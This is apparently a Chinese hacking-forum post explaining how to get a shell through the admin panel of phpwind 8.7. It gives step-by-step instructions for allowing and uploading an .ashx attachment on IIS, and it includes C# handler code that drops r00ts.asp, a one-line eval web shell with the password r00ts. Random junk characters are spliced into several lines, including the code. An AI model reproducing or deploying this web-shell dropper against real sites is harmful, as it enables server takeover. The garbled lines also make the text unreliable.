phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
9 F/ k' L$ W& O  ]; Q$ X7 u
- D: p0 j& g# r, p5 B# z8 q$ V# a然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
9 Z5 X- Y5 Q. v7 k
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts

下面是代码:

( s% o2 ]4 ]5 u; I/ U9 T4 Z<%@ WebHandler Language="C#"Class="Handler" %>
9 c: F# D4 c- W$ [/ a% `. h. K- busing System;
using System.Web;
using System.IO;
% }) \/ \  p* W2 J: cpublic class Handler : IHttpHandler {
: m, V2 q. {1 L& V/ _: O3 d( [3 i3 o& Upublic void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
) V. M' W2 H' z, r' E* zStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
file1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
/ q3 Y4 |# i: Y( ?8 `& u8 C# Cget {
return false;
$ T) O( ~- j) ~}
- d2 t( x: |9 l+ R# A}
}